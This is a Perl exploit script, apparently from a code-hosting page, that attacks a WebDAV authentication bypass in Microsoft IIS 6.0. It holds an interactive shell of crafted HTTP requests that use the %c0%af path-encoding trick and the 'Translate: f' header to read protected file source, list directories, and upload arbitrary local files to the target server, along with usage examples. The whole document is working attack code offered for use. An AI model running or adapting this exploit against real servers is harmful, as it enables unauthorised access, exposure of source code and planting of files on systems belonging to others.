125 lines
No EOL
2.8 KiB
Perl
Executable file
125 lines
No EOL
2.8 KiB
Perl
Executable file
#!/usr/bin/perl -W
|
|
#
|
|
# Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
|
|
# written by ka0x <ka0x01[alt+64]gmail.com>
|
|
# Advisory: http://www.milw0rm.com/exploits/8765
|
|
#
|
|
# Greets: an0de, Piker, xarnuz, NullWave07, Pepelux, k0rde, JoSs, Trancek and others!
|
|
|
|
use IO::Socket ;
|
|
|
|
my ( $host, $path ) = @ARGV ;
|
|
my $port = 80 ; # webserver port
|
|
|
|
&usage unless $ARGV[1] ;
|
|
|
|
$host =~ s/http:\/\/// if($host =~ /^http:\/\//i) ;
|
|
$path =~ s/\/// if(substr($path, 0,1) eq '/');
|
|
|
|
sub _file {
|
|
$file = shift ;
|
|
open(FILE, $file) || die "[-] ERROR: ".$!,"\n" ;
|
|
while( <FILE> ){
|
|
$cont .= $_ ;
|
|
}
|
|
close(FILE) ;
|
|
return $cont ;
|
|
}
|
|
|
|
|
|
print "write 'help' for get help list\n";
|
|
|
|
|
|
while( 1 ) {
|
|
|
|
my $sock = IO::Socket::INET->new (PeerAddr => $host,
|
|
PeerPort => $port,
|
|
Proto => 'tcp') || die "\n[-] ERROR: ".$!,"\n" ;
|
|
print "\$> ";
|
|
chomp( my $option = <STDIN> ) ;
|
|
last if $option eq 'quit' ;
|
|
|
|
if($option eq 'source') {
|
|
$path =~ s/\//%c0%af\// ;
|
|
print $sock "GET /".$path." HTTP/1.1\r\n" ;
|
|
print $sock "Translate: f\r\n" ;
|
|
print $sock "Host: ".$host."\r\n" ;
|
|
print $sock "Connection: close\r\n\r\n" ;
|
|
|
|
while(<$sock>){
|
|
print $_ ;
|
|
}
|
|
close($sock) ;
|
|
}
|
|
|
|
|
|
elsif($option eq 'path') {
|
|
$path =~ s/\//%c0%af\// ;
|
|
print $sock "PROPFIND /".$path." HTTP/1.1\r\n" ;
|
|
print $sock "Host: ".$host."\r\n" ;
|
|
print $sock "Connection:close\r\n" ;
|
|
print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
|
|
print $sock "Content-Length: 0\r\n\r\n" ;
|
|
print $sock '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>' ;
|
|
|
|
while(<$sock>){
|
|
print $_ ;
|
|
}
|
|
close($sock) ;
|
|
}
|
|
|
|
|
|
elsif($option eq 'put') {
|
|
$path =~ s/\//%c0%af\// ;
|
|
print "[*] Insert a local file (ex: /root/file.txt): " ;
|
|
chomp( $local = <STDIN> ) ;
|
|
$file_l = _file( $local ) ;
|
|
print $sock "PUT /".$path."my_file.txt HTTP/1.1\r\n" ;
|
|
print $sock "Host: ".$host."\r\n" ;
|
|
print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
|
|
print $sock "Connection:close\r\n" ;
|
|
print $sock "Content-Length: ".length($file_l)."\r\n\r\n" ;
|
|
print $sock $file_l,"\r\n" ;
|
|
|
|
while(<$sock>){
|
|
print $_ ;
|
|
}
|
|
close($sock) ;
|
|
}
|
|
|
|
elsif($option eq 'help') {
|
|
print "\n\t\t- OPTIONS -\n\n\n" ;
|
|
print "\thelp\t\tgive this help list\n" ;
|
|
print "\tsource\t\tget file content\n" ;
|
|
print "\tpath\t\tget directory contents\n" ;
|
|
print "\tput\t\tput file\n" ;
|
|
print "\tquit\t\texit exploit\n\n" ;
|
|
}
|
|
|
|
}
|
|
|
|
sub usage {
|
|
print << 'EOH' ;
|
|
|
|
$ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
|
|
$ written by ka0x <ka0x01[at]gmail.com>
|
|
$ 25/05/2009
|
|
|
|
usage:
|
|
perl $0 <host> <path>
|
|
|
|
example:
|
|
perl $0 localhost dir/
|
|
perl $0 localhost dir/file.txt
|
|
|
|
EOH
|
|
|
|
exit;
|
|
}
|
|
|
|
|
|
|
|
|
|
__END__
|
|
|
|
# milw0rm.com [2009-05-26] |